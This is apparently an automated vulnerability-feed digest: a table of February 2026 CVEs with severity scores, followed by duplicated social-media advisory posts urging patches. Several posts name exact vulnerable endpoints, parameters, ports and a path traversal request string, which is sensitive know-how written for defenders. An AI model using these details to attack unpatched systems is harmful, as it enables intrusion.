##
Updated at UTC 2026-02-19T03:40:37.023009
| CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
|---|---|---|---|---|---|---|---|
| CVE-2026-27182 | 8.4 | 0.00% | 2 | 0 | 2026-02-19T00:30:37 | Saturn Remote Mouse Server contains a command injection vulnerability that allow | |
| CVE-2026-27180 | 9.8 | 0.00% | 4 | 0 | 2026-02-19T00:30:30 | MajorDoMo (aka Major Domestic Module) is vulnerable to unauthenticated remote co | |
| CVE-2026-2686 | 9.8 | 0.00% | 4 | 0 | 2026-02-19T00:16:22.143000 | A security vulnerability has been detected in SECCN Dingcheng G10 3.1.0.181203. | |
| CVE-2026-22860 | 7.5 | 0.00% | 2 | 0 | 2026-02-18T23:49:03 | ## Summary `Rack::Directory`’s path check used a string prefix match on the exp | |
| CVE-2026-2650 | 8.8 | 0.00% | 4 | 0 | 2026-02-18T23:16:20.720000 | Heap buffer overflow in Media in Google Chrome prior to 145.0.7632.109 allowed a | |
| CVE-2026-2649 | 8.8 | 0.00% | 2 | 0 | 2026-02-18T23:16:20.557000 | Integer overflow in V8 in Google Chrome prior to 145.0.7632.109 allowed a remote | |
| CVE-2026-25548 | 9.1 | 0.00% | 2 | 0 | 2026-02-18T23:16:19.567000 | InvoicePlane is a self-hosted open source application for managing invoices, cli | |
| CVE-2026-25903 | None | 0.01% | 1 | 0 | 2026-02-18T22:39:27 | Apache NiFi 1.1.0 through 2.7.2 are missing authorization when updating configur | |
| CVE-2026-27181 | 7.5 | 0.00% | 2 | 0 | 2026-02-18T22:16:26.337000 | MajorDoMo (aka Major Domestic Module) allows unauthenticated arbitrary module un | |
| CVE-2026-27179 | 8.2 | 0.00% | 2 | 0 | 2026-02-18T22:16:25.967000 | MajorDoMo (aka Major Domestic Module) contains an unauthenticated SQL injection | |
| CVE-2026-27175 | 9.8 | 0.00% | 4 | 0 | 2026-02-18T22:16:25.263000 | MajorDoMo (aka Major Domestic Module) is vulnerable to unauthenticated OS comman | |
| CVE-2026-27174 | 9.8 | 0.00% | 4 | 0 | 2026-02-18T22:16:25.080000 | MajorDoMo (aka Major Domestic Module) allows unauthenticated remote code executi | |
| CVE-2026-1435 | 9.8 | 0.00% | 4 | 0 | 2026-02-18T21:32:25 | Not properly invalidated session vulnerability in Graylog Web Interface, version | |
| CVE-2025-1272 | 7.8 | 0.00% | 2 | 2 | 2026-02-18T21:31:34 | The Linux Kernel lockdown mode for kernel versions starting on 6.12 and above fo | |
| CVE-2026-0875 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T21:31:34 | A maliciously crafted MODEL file, when parsed through certain Autodesk products, | |
| CVE-2025-70064 | 8.8 | 0.00% | 2 | 0 | 2026-02-18T21:31:23 | PHPGurukul Hospital Management System v4.0 contains a Privilege Escalation vulne | |
| CVE-2025-70147 | 7.5 | 0.00% | 2 | 0 | 2026-02-18T21:31:23 | Missing authentication in /admin/student.php and /admin/teacher.php in ProjectWo | |
| CVE-2025-65717 | 4.3 | 0.03% | 6 | 0 | 2026-02-18T21:16:21.480000 | An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to | |
| CVE-2026-0874 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T20:18:32.193000 | A maliciously crafted CATPART file, when parsed through certain Autodesk product | |
| CVE-2025-14009 | 10.0 | 0.00% | 4 | 0 | 2026-02-18T20:18:31.207000 | A critical vulnerability exists in the NLTK downloader component of nltk/nltk, a | |
| CVE-2026-22769 | 10.0 | 0.07% | 26 | 0 | 2026-02-18T20:01:15.983000 | Dell RecoverPoint for Virtual Machines, versions prior to 6.0.3.1 HF1, contain a | |
| CVE-2025-70149 | 9.8 | 0.00% | 2 | 0 | 2026-02-18T19:21:43.090000 | CodeAstro Membership Management System 1.0 is vulnerable to SQL Injection in pri | |
| CVE-2025-70146 | 9.1 | 0.00% | 2 | 0 | 2026-02-18T19:21:42.767000 | Missing authentication in multiple administrative action scripts under /admin/ i | |
| CVE-2021-22175 | 9.8 | 52.88% | 4 | 0 | template | 2026-02-18T18:31:26 | When requests to the internal network for webhooks are enabled, a server-side re |
| CVE-2026-24708 | 8.2 | 0.00% | 2 | 0 | 2026-02-18T18:30:51 | An issue was discovered in OpenStack Nova before 30.2.2, 31 before 31.2.1, and 3 | |
| CVE-2026-2507 | 7.5 | 0.00% | 4 | 0 | 2026-02-18T18:30:51 | When BIG-IP AFM or BIG-IP DDoS is provisioned, undisclosed traffic can cause TMM | |
| CVE-2025-70148 | 7.5 | 0.00% | 2 | 0 | 2026-02-18T18:30:47 | Missing authentication and authorization in print_membership_card.php in CodeAst | |
| CVE-2025-65791 | 9.8 | 0.00% | 2 | 1 | 2026-02-18T18:30:39 | ZoneMinder v1.36.34 is vulnerable to Command Injection in web/views/image.php. T | |
| CVE-2025-70998 | 9.8 | 0.00% | 4 | 0 | 2026-02-18T18:30:39 | UTT HiPER 810 / nv810v4 router firmware v1.5.0-140603 was discovered to contain | |
| CVE-2026-27099 | 8.0 | 0.00% | 6 | 0 | 2026-02-18T18:30:38 | Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both | |
| CVE-2025-61982 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T18:30:38 | An arbitrary code execution vulnerability exists in the Code Stream directive fu | |
| CVE-2025-70150 | 9.8 | 0.00% | 2 | 0 | 2026-02-18T18:24:20.040000 | CodeAstro Membership Management System 1.0 contains a missing authentication vul | |
| CVE-2025-70866 | 8.8 | 0.03% | 2 | 0 | 2026-02-18T17:52:44.520000 | LavaLite CMS 10.1.0 is vulnerable to Incorrect Access Control. An authenticated | |
| CVE-2025-70954 | 7.5 | 0.02% | 2 | 0 | 2026-02-18T17:52:44.520000 | A Null Pointer Dereference vulnerability exists in the TON Virtual Machine (TVM) | |
| CVE-2025-70828 | 8.8 | 0.05% | 2 | 1 | 2026-02-18T17:52:22.253000 | An issue in Datart v1.0.0-rc.3 allows attackers to execute arbitrary code via th | |
| CVE-2025-15578 | 9.8 | 0.04% | 2 | 0 | 2026-02-18T17:52:22.253000 | Maypole versions from 2.10 through 2.13 for Perl generates session ids insecurel | |
| CVE-2026-1334 | 7.8 | 0.01% | 2 | 0 | 2026-02-18T17:52:22.253000 | An Out-Of-Bounds Read vulnerability affecting the EPRT file reading procedure in | |
| CVE-2026-1046 | 7.6 | 0.03% | 3 | 0 | 2026-02-18T17:52:22.253000 | Mattermost Desktop App versions <=6.0 6.2.0 5.2.13.0 fail to validate help links | |
| CVE-2026-1750 | 8.8 | 0.03% | 1 | 0 | 2026-02-18T17:52:22.253000 | The Ecwid by Lightspeed Ecommerce Shopping Cart plugin for WordPress is vulnerab | |
| CVE-2025-32061 | 8.8 | 0.02% | 1 | 0 | 2026-02-18T17:52:22.253000 | The specific flaw exists within the Bluetooth stack developed by Alps Alpine of | |
| CVE-2026-2329 | 0 | 0.00% | 6 | 0 | 2026-02-18T17:51:53.510000 | An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP | |
| CVE-2026-1670 | 9.8 | 0.04% | 10 | 0 | 2026-02-18T17:51:53.510000 | The affected products are vulnerable to an unauthenticated API endpoint exposure | |
| CVE-2026-26119 | 8.8 | 0.08% | 6 | 0 | 2026-02-18T17:51:53.510000 | Improper authentication in Windows Admin Center allows an authorized attacker to | |
| CVE-2025-33241 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T17:51:53.510000 | NVIDIA NeMo Framework contains a vulnerability where an attacker could cause rem | |
| CVE-2025-33240 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T17:51:53.510000 | NVIDIA Megatron Bridge contains a vulnerability in a data shuffling tutorial, wh | |
| CVE-2025-33251 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T17:51:53.510000 | NVIDIA NeMo Framework contains a vulnerability where an attacker could cause rem | |
| CVE-2025-33245 | 8.0 | 0.00% | 2 | 0 | 2026-02-18T17:51:53.510000 | NVIDIA NeMo Framework contains a vulnerability where malicious data could cause | |
| CVE-2025-60035 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T17:51:53.510000 | A vulnerability has been identified in the OPC.Testclient utility, which is incl | |
| CVE-2025-33253 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T17:51:53.510000 | NVIDIA NeMo Framework contains a vulnerability where an attacker could cause rem | |
| CVE-2026-1937 | 9.8 | 0.04% | 4 | 0 | 2026-02-18T17:51:53.510000 | The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to | |
| CVE-2026-22048 | 7.1 | 0.04% | 2 | 0 | 2026-02-18T17:51:53.510000 | StorageGRID (formerly StorageGRID Webscale) versions prior to 11.9.0.12 and 12.0 | |
| CVE-2026-23599 | 7.8 | 0.01% | 4 | 0 | 2026-02-18T17:51:53.510000 | A local privilege-escalation vulnerability has been discovered in the HPE Aruba | |
| CVE-2025-13691 | 8.1 | 0.03% | 2 | 0 | 2026-02-18T17:51:53.510000 | IBM DataStage on Cloud Pak for Data 5.1.2 through 5.3.0 returns sensitive inform | |
| CVE-2026-23595 | 8.8 | 0.09% | 2 | 0 | 2026-02-18T17:51:53.510000 | An authentication bypass in the application API allows an unauthorized administr | |
| CVE-2026-2630 | 8.8 | 0.29% | 4 | 0 | 2026-02-18T17:51:53.510000 | A Command Injection vulnerability exists where an authenticated, remote attacker | |
| CVE-2026-1368 | 7.5 | 0.01% | 2 | 0 | 2026-02-18T15:32:29 | The Video Conferencing with Zoom WordPress plugin before 4.6.6 contains an AJAX | |
| CVE-2026-1426 | 8.8 | 0.00% | 4 | 0 | 2026-02-18T15:31:35 | The Advanced AJAX Product Filters plugin for WordPress is vulnerable to PHP Obje | |
| CVE-2025-33250 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T15:31:34 | NVIDIA NeMo Framework contains a vulnerability where an attacker could cause rem | |
| CVE-2025-60037 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T15:31:34 | A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an a | |
| CVE-2025-33239 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T15:31:33 | NVIDIA Megatron Bridge contains a vulnerability in a data merging tutorial, wher | |
| CVE-2025-33236 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T15:31:33 | NVIDIA NeMo Framework contains a vulnerability where malicious data created by a | |
| CVE-2025-33249 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T15:31:33 | NVIDIA NeMo Framework for all platforms contains a vulnerability in a voice-prep | |
| CVE-2025-33246 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T15:31:33 | NVIDIA NeMo Framework for all platforms contains a vulnerability in the ASR Eval | |
| CVE-2025-33243 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T15:31:33 | NVIDIA NeMo Framework contains a vulnerability where an attacker could cause rem | |
| CVE-2025-60038 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T15:31:33 | A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an a | |
| CVE-2025-60036 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T15:31:33 | A vulnerability has been identified in the UA.Testclient utility, which is inclu | |
| CVE-2025-33252 | 7.8 | 0.00% | 2 | 0 | 2026-02-18T15:31:33 | NVIDIA NeMo Framework contains a vulnerability where an attacker could cause rem | |
| CVE-2025-65715 | 7.8 | 0.02% | 4 | 0 | 2026-02-18T15:31:25 | An issue in the code-runner.executorMap setting of Visual Studio Code Extensions | |
| CVE-2024-7694 | 7.2 | 1.86% | 6 | 0 | 2026-02-18T13:46:48.840000 | ThreatSonar Anti-Ransomware from TeamT5 does not properly validate the content o | |
| CVE-2026-2441 | 8.8 | 0.63% | 25 | 3 | 2026-02-18T13:46:40.307000 | Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote a | |
| CVE-2026-2495 | 7.5 | 0.08% | 4 | 0 | 2026-02-18T09:32:07 | The WPNakama – Team and multi-Client Collaboration, Editorial and Project Manage | |
| CVE-2026-1714 | 8.6 | 0.06% | 2 | 0 | 2026-02-18T06:30:25 | The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All | |
| CVE-2026-2576 | 7.5 | 0.07% | 2 | 0 | 2026-02-18T06:30:25 | The Business Directory Plugin – Easy Listing Directories for WordPress plugin fo | |
| CVE-2025-13689 | 8.8 | 0.03% | 2 | 0 | 2026-02-18T00:30:22 | IBM DataStage on Cloud Pak for Data could allow an authenticated user to execute | |
| CVE-2026-2627 | 7.8 | 0.01% | 2 | 0 | 2026-02-18T00:30:22 | A security flaw has been discovered in Softland FBackup up to 9.9. This impacts | |
| CVE-2026-23647 | 9.8 | 0.26% | 4 | 0 | 2026-02-17T21:32:21 | Glory RBG-100 recycler systems using the ISPK-08 software component contain hard | |
| CVE-2026-22208 | 9.7 | 0.17% | 4 | 0 | 2026-02-17T21:32:21 | OpenS100 (the reference implementation S-100 viewer) prior to commit 753cf29 con | |
| CVE-2025-67905 | 8.7 | 0.01% | 2 | 0 | 2026-02-17T21:32:21 | Malwarebytes AdwCleaner before v.8.7.0 runs as Administrator and performs an ins | |
| CVE-2026-23648 | 7.8 | 0.01% | 2 | 0 | 2026-02-17T21:32:21 | Glory RBG-100 recycler systems using the ISPK-08 software component contain mult | |
| CVE-2026-0929 | 7.5 | 0.03% | 2 | 0 | 2026-02-17T21:32:21 | The RegistrationMagic WordPress plugin before 6.0.7.2 does not have proper capa | |
| CVE-2026-0829 | 5.8 | 0.02% | 1 | 0 | 2026-02-17T21:32:21 | The Frontend File Manager Plugin WordPress plugin through 23.5 allows unauthenti | |
| CVE-2020-7796 | 9.8 | 93.55% | 6 | 0 | template | 2026-02-17T21:32:16 | Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zi |
| CVE-2008-0015 | 8.8 | 80.64% | 6 | 0 | 2026-02-17T21:32:16 | Stack-based buffer overflow in the CComVariant::ReadFromStream function in the A | |
| CVE-2026-1358 | 9.8 | 0.15% | 1 | 0 | 2026-02-17T19:21:56.343000 | Airleader Master versions 6.381 and prior allow for file uploads without restri | |
| CVE-2025-70956 | 7.5 | 0.06% | 2 | 0 | 2026-02-17T18:34:01 | A State Pollution vulnerability was discovered in the TON Virtual Machine (TVM) | |
| CVE-2025-65753 | 9.1 | 0.04% | 2 | 1 | 2026-02-17T18:33:00 | An issue in the TLS certification mechanism of Guardian Gryphon v01.06.0006.22 a | |
| CVE-2025-70397 | 8.8 | 0.03% | 2 | 0 | 2026-02-17T18:33:00 | jizhicms 2.5.6 is vulnerable to SQL Injection in Article/deleteAll and Extmolds/ | |
| CVE-2025-70830 | 10.0 | 0.02% | 2 | 1 | 2026-02-17T18:33:00 | A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template | |
| CVE-2025-65716 | 8.8 | 0.05% | 4 | 0 | 2026-02-17T15:32:42 | An issue in Visual Studio Code Extensions Markdown Preview Enhanced v0.8.18 allo | |
| CVE-2026-2439 | 9.8 | 0.05% | 6 | 0 | 2026-02-17T15:32:42 | Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure | |
| CVE-2025-69633 | 9.8 | 0.08% | 2 | 0 | 2026-02-17T15:32:42 | A SQL Injection vulnerability in the Advanced Popup Creator (advancedpopupcreato | |
| CVE-2026-2474 | 7.5 | 0.04% | 4 | 0 | 2026-02-17T15:32:42 | Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap b | |
| CVE-2026-2447 | 8.8 | 0.04% | 6 | 0 | 2026-02-17T15:32:41 | Heap buffer overflow in libvpx. This vulnerability affects Firefox < 147.0.4, Fi | |
| CVE-2026-2616 | 8.8 | 0.02% | 2 | 0 | 2026-02-17T15:31:36 | A vulnerability has been found in Beetel 777VR1 up to 01.00.09. The impacted ele | |
| CVE-2026-1731 | 9.8 | 49.74% | 1 | 4 | template | 2026-02-17T13:40:10.320000 | BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote |
| CVE-2026-2247 | None | 0.10% | 2 | 0 | 2026-02-17T12:31:18 | SQL injection vulnerability (SQLi) in Clicldeu SaaS, specifically in the generat | |
| CVE-2025-7631 | 8.6 | 0.03% | 1 | 0 | 2026-02-17T12:31:13 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti | |
| CVE-2026-2592 | 7.7 | 0.07% | 2 | 1 | 2026-02-17T06:31:26 | The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Impro | |
| CVE-2026-26220 | None | 0.55% | 1 | 0 | 2026-02-17T03:30:16 | LightLLM version 1.1.0 and prior contain an unauthenticated remote code executio | |
| CVE-2025-12062 | 8.8 | 0.06% | 1 | 0 | 2026-02-17T00:30:19 | The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & | |
| CVE-2026-2564 | 8.1 | 0.04% | 1 | 1 | 2026-02-16T18:31:31 | A security flaw has been discovered in Intelbras VIP 3260 Z IA 2.840.00IB005.0.T | |
| CVE-2026-1333 | 7.8 | 0.01% | 1 | 0 | 2026-02-16T15:32:54 | A Use of Uninitialized Variable vulnerability affecting the EPRT file reading pr | |
| CVE-2026-2451 | None | 0.05% | 1 | 0 | 2026-02-16T12:32:02 | Emails sent by pretix can utilize placeholders that will be filled with customer | |
| CVE-2026-2452 | None | 0.05% | 1 | 0 | 2026-02-16T12:32:01 | Emails sent by pretix can utilize placeholders that will be filled with customer | |
| CVE-2026-2577 | 10.0 | 0.06% | 1 | 0 | 2026-02-16T12:32:00 | The WhatsApp bridge component in Nanobot binds the WebSocket server to all netwo | |
| CVE-2026-26369 | 9.8 | 0.01% | 3 | 0 | 2026-02-15T18:30:25 | eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerabi | |
| CVE-2026-26366 | 9.8 | 0.03% | 2 | 0 | 2026-02-15T18:30:24 | eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user | |
| CVE-2025-32062 | 8.8 | 0.02% | 3 | 0 | 2026-02-15T12:30:34 | The specific flaw exists within the Bluetooth stack developed by Alps Alpine of | |
| CVE-2025-32058 | 9.4 | 0.01% | 2 | 0 | 2026-02-15T12:30:34 | The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communica | |
| CVE-2025-32059 | 8.8 | 0.02% | 1 | 0 | 2026-02-15T12:30:25 | The specific flaw exists within the Bluetooth stack developed by Alps Alpine of | |
| CVE-2026-1490 | 9.8 | 0.04% | 3 | 1 | 2026-02-15T06:31:38 | The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vu | |
| CVE-2024-43468 | 9.8 | 84.80% | 1 | 3 | 2026-02-13T14:04:05.243000 | Microsoft Configuration Manager Remote Code Execution Vulnerability | |
| CVE-2026-2360 | 8.1 | 0.05% | 2 | 0 | 2026-02-11T18:31:37 | PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superu | |
| CVE-2026-24061 | 9.8 | 76.94% | 1 | 61 | template | 2026-02-11T15:40:42.937000 | telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a " |
| CVE-2026-21510 | 8.8 | 2.72% | 1 | 1 | 2026-02-10T21:31:29 | Protection mechanism failure in Windows Shell allows an unauthorized attacker to | |
| CVE-2026-21513 | 8.8 | 4.12% | 1 | 0 | 2026-02-10T21:31:29 | Protection mechanism failure in MSHTML Framework allows an unauthorized attacker | |
| CVE-2025-14831 | 5.3 | 0.04% | 1 | 0 | 2026-02-09T16:08:35.290000 | A flaw was found in GnuTLS. This vulnerability allows a denial of service (DoS) | |
| CVE-2026-22903 | 9.8 | 0.57% | 1 | 0 | 2026-02-09T09:30:28 | An unauthenticated remote attacker can send a crafted HTTP request containing an | |
| CVE-2026-24423 | 9.8 | 22.65% | 1 | 1 | 2026-02-06T16:45:15.323000 | SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated | |
| CVE-2026-1340 | 9.8 | 29.29% | 4 | 1 | 2026-02-04T16:34:21.763000 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve | |
| CVE-2021-39935 | 6.8 | 57.16% | 2 | 0 | 2026-02-04T15:56:15.730000 | An issue has been discovered in GitLab CE/EE affecting all versions starting fro | |
| CVE-2025-15467 | 9.8 | 0.92% | 2 | 4 | 2026-02-02T18:38:55.073000 | Issue summary: Parsing CMS AuthEnvelopedData message with maliciously crafted AE | |
| CVE-2026-1281 | 9.8 | 39.20% | 7 | 1 | 2026-01-30T00:31:29 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve | |
| CVE-2026-23760 | 9.8 | 55.75% | 1 | 2 | template | 2026-01-27T18:33:14 | SmarterTools SmarterMail versions prior to build 9511 contain an authentication |
| CVE-2025-64155 | 9.8 | 0.04% | 2 | 4 | 2026-01-20T16:16:06.200000 | An improper neutralization of special elements used in an os command ('os comman | |
| CVE-2026-20965 | 7.6 | 0.03% | 2 | 0 | 2026-01-13T18:31:18 | Improper verification of cryptographic signature in Windows Admin Center allows | |
| CVE-2025-59922 | 7.2 | 0.05% | 2 | 0 | 2026-01-13T18:31:14 | An improper neutralization of special elements used in an SQL command ('SQL Inje | |
| CVE-2025-6264 | 4.7 | 0.07% | 1 | 1 | 2025-10-13T15:45:56 | Velociraptor allows collection of VQL queries packaged into Artifacts from endpo | |
| CVE-2021-22214 | None | 93.52% | 2 | 4 | template | 2023-01-29T05:06:54 | When requests to the internal network for webhooks are enabled, a server-side re |
| CVE-2025-41725 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2026-2239 | 0 | 0.00% | 1 | 0 | N/A | ||
| CVE-2026-02447 | 0 | 0.00% | 1 | 0 | N/A |
updated 2026-02-19T00:30:37
2 posts
🟠 CVE-2026-27182 - High (8.4)
Saturn Remote Mouse Server contains a command injection vulnerability that allows unauthenticated attackers to execute arbitrary commands by sending specially crafted UDP JSON frames to port 27000. Attackers on the local network can send malformed...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27182/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-27182 - High (8.4)
Saturn Remote Mouse Server contains a command injection vulnerability that allows unauthenticated attackers to execute arbitrary commands by sending specially crafted UDP JSON frames to port 27000. Attackers on the local network can send malformed...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27182/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-19T00:30:30
4 posts
🔴 CVE-2026-27180 - Critical (9.8)
MajorDoMo (aka Major Domestic Module) is vulnerable to unauthenticated remote code execution through supply chain compromise via update URL poisoning. The saverestore module exposes its admin() method through the /objects/?module=saverestore endpo...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27180/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🚨 CRITICAL: CVE-2026-27180 in sergejey MajorDoMo allows unauthenticated RCE via poisoned update URLs. Attackers can deploy arbitrary PHP files to webroot with 2 GETs. Patch urgently! https://radar.offseq.com/threat/cve-2026-27180-download-of-code-without-integrity--99709b79 #OffSeq #CVE #infosec #remotecodeexecution
##🔴 CVE-2026-27180 - Critical (9.8)
MajorDoMo (aka Major Domestic Module) is vulnerable to unauthenticated remote code execution through supply chain compromise via update URL poisoning. The saverestore module exposes its admin() method through the /objects/?module=saverestore endpo...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27180/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🚨 CRITICAL: CVE-2026-27180 in sergejey MajorDoMo allows unauthenticated RCE via poisoned update URLs. Attackers can deploy arbitrary PHP files to webroot with 2 GETs. Patch urgently! https://radar.offseq.com/threat/cve-2026-27180-download-of-code-without-integrity--99709b79 #OffSeq #CVE #infosec #remotecodeexecution
##updated 2026-02-19T00:16:22.143000
4 posts
🚨 CRITICAL: CVE-2026-2686 in SECCN Dingcheng G10 (v3.1.0.181203) enables unauthenticated remote OS command injection via the 'User' param in /cgi-bin/session_login.cgi. Exploit code is public. Restrict access & monitor! https://radar.offseq.com/threat/cve-2026-2686-os-command-injection-in-seccn-dingch-6d02b310 #OffSeq #CVE20262686 #IoTSec
##🔴 CVE-2026-2686 - Critical (9.8)
A security vulnerability has been detected in SECCN Dingcheng G10 3.1.0.181203. This impacts the function qq of the file /cgi-bin/session_login.cgi. The manipulation of the argument User leads to os command injection. The attack is possible to be ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2686/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🚨 CRITICAL: CVE-2026-2686 in SECCN Dingcheng G10 (v3.1.0.181203) enables unauthenticated remote OS command injection via the 'User' param in /cgi-bin/session_login.cgi. Exploit code is public. Restrict access & monitor! https://radar.offseq.com/threat/cve-2026-2686-os-command-injection-in-seccn-dingch-6d02b310 #OffSeq #CVE20262686 #IoTSec
##🔴 CVE-2026-2686 - Critical (9.8)
A security vulnerability has been detected in SECCN Dingcheng G10 3.1.0.181203. This impacts the function qq of the file /cgi-bin/session_login.cgi. The manipulation of the argument User leads to os command injection. The attack is possible to be ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2686/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T23:49:03
2 posts
🟠 CVE-2026-22860 - High (7.5)
Rack is a modular Ruby web server interface. Prior to versions 2.2.22, 3.1.20, and 3.2.5, `Rack::Directory`’s path check used a string prefix match on the expanded path. A request like `/../root_example/` can escape the configured root if the ta...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22860/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-22860 - High (7.5)
Rack is a modular Ruby web server interface. Prior to versions 2.2.22, 3.1.20, and 3.2.5, `Rack::Directory`’s path check used a string prefix match on the expanded path. A request like `/../root_example/` can escape the configured root if the ta...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22860/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T23:16:20.720000
4 posts
⚠️ CVE-2026-2650: HIGH severity heap buffer overflow in Google Chrome before 145.0.7632.109. Remote attackers can exploit via malicious HTML for code execution. Patch ASAP! https://radar.offseq.com/threat/cve-2026-2650-heap-buffer-overflow-in-google-chrom-0bc72c99 #OffSeq #Chrome #Vuln #CVE20262650
##🟠 CVE-2026-2650 - High (8.8)
Heap buffer overflow in Media in Google Chrome prior to 145.0.7632.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2650/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##⚠️ CVE-2026-2650: HIGH severity heap buffer overflow in Google Chrome before 145.0.7632.109. Remote attackers can exploit via malicious HTML for code execution. Patch ASAP! https://radar.offseq.com/threat/cve-2026-2650-heap-buffer-overflow-in-google-chrom-0bc72c99 #OffSeq #Chrome #Vuln #CVE20262650
##🟠 CVE-2026-2650 - High (8.8)
Heap buffer overflow in Media in Google Chrome prior to 145.0.7632.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2650/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T23:16:20.557000
2 posts
🟠 CVE-2026-2649 - High (8.8)
Integer overflow in V8 in Google Chrome prior to 145.0.7632.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2649/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2649 - High (8.8)
Integer overflow in V8 in Google Chrome prior to 145.0.7632.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2649/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T23:16:19.567000
2 posts
🔴 CVE-2026-25548 - Critical (9.1)
InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. A critical Remote Code Execution (RCE) vulnerability exists in InvoicePlane 1.7.0 through a chained Local File Inclusion (LFI) and Log Poisoning at...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25548/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-25548 - Critical (9.1)
InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. A critical Remote Code Execution (RCE) vulnerability exists in InvoicePlane 1.7.0 through a chained Local File Inclusion (LFI) and Log Poisoning at...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25548/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T22:39:27
1 posts
🔥 HIGH severity vuln: CVE-2026-25903 in Apache NiFi 1.1.0 – 2.7.2 lets less-privileged users alter restricted component configs. Upgrade to 2.8.0 ASAP. Monitor permissions & flows! https://radar.offseq.com/threat/cve-2026-25903-cwe-862-missing-authorization-in-ap-96d68c81 #OffSeq #NiFi #infosec #CVE202625903
##updated 2026-02-18T22:16:26.337000
2 posts
🟠 CVE-2026-27181 - High (7.5)
MajorDoMo (aka Major Domestic Module) allows unauthenticated arbitrary module uninstallation through the market module. The market module's admin() method reads gr('mode') from $_REQUEST and assigns it to $this->mode at the start of execution, mak...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27181/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-27181 - High (7.5)
MajorDoMo (aka Major Domestic Module) allows unauthenticated arbitrary module uninstallation through the market module. The market module's admin() method reads gr('mode') from $_REQUEST and assigns it to $this->mode at the start of execution, mak...
